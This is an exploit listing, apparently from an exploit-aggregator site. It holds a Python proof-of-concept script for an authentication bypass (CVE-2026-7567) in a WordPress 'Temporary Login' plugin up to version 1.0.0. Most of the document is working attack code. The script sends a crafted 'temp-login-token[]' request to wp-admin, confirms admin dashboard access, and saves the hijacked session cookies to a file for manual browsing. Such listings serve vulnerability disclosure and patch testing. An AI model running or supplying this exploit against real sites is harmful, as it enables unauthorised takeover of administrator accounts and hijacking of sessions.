Share
## https://sploitus.com/exploit?id=PACKETSTORM:222215
# Exploit Title: Wordpress Temporary Login Plugin  1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover
    # Date: 2026-05-02
    # Exploit Author: Amir Hossein Jamshidi
    # Vendor Homepage: https://wordpress.org
    # Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip
    # Version: <= 1.0.0
    # Tested on: Linux
    # CVE : CVE-2026-7567
    
    
    #!/usr/bin/env python3
    import requests
    
    print('''
    #################################################################################
    #  Temporary Login Plugin <= 1.0.0 - 'temp-login-token' Authentication Bypass   #
    #                   BY: Amir Hossein Jamshidi                                   #
    #               Mail: amirhosseinjamshidi64@gmail.com                           #
    #           github: https://github.com/amirhosseinjamshidi64                    #
    #                    Usage: python Exploit.py                                   #
    #################################################################################
    ''')
    
    # Target URL - CHANGE THIS to your WordPress URL
    target = input("Enter Target (example: https://evil.com/): ")
    url = target + "wp-admin/?temp-login-token[]"
    print("[*] Sending exploit request...")
    response = requests.get(url, allow_redirects=True)
    
    print(f"[*] Final URL: {response.url}")
    print(f"[*] Response status: {response.status_code}")
    
    # Check if we got admin cookies
    if 'wp-settings-time' in str(response.cookies):
        print("[โœ“] SUCCESS! Authentication bypassed!")
        print("[โœ“] WordPress logged-in cookie found")
        # Try to access admin area with the same session
        admin_check = requests.get(
            response.url.replace('wp-login.php', 'wp-admin/'),
            cookies=response.cookies
        )
        if 'Dashboard' in admin_check.text or 'wp-admin' in admin_check.url:
            print("[โœ“] Full admin access confirmed!")
            print("[โœ“] You are now logged in as a temporary user")
        else:
            print("[!] Logged in but no admin access (user may have limited role)")
    else:
        print("[-] Exploit failed. Reasons:")
        print("    - Plugin not installed or not version 1.0.0")
        print("    - No temporary users exist")
        print("    - Plugin is patched")
    # Save cookies for manual browsing
    with open('wordpress_cookies.txt', 'w') as f:
        for cookie in response.cookies:
            f.write(f"{cookie.name}={cookie.value}\n")
    print("[*] Cookies saved to wordpress_cookies.txt")